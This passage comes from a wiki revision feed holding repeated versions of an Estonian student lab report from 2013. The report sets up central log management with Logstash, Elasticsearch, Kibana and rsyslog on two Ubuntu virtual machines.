&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
*.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68986</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68986"/>
		<updated>2013-11-28T11:36:28Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Logstash */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid&lt;br /&gt;
&lt;br /&gt;
Elasticsearch versioon 0.90.0 - logide talletamiseks&lt;br /&gt;
&lt;br /&gt;
Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ja faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
*.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68985</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68985"/>
		<updated>2013-11-28T11:34:50Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Kasutatud tarkvara */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid&lt;br /&gt;
&lt;br /&gt;
Elasticsearch versioon 0.90.0 - logide talletamiseks&lt;br /&gt;
&lt;br /&gt;
Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
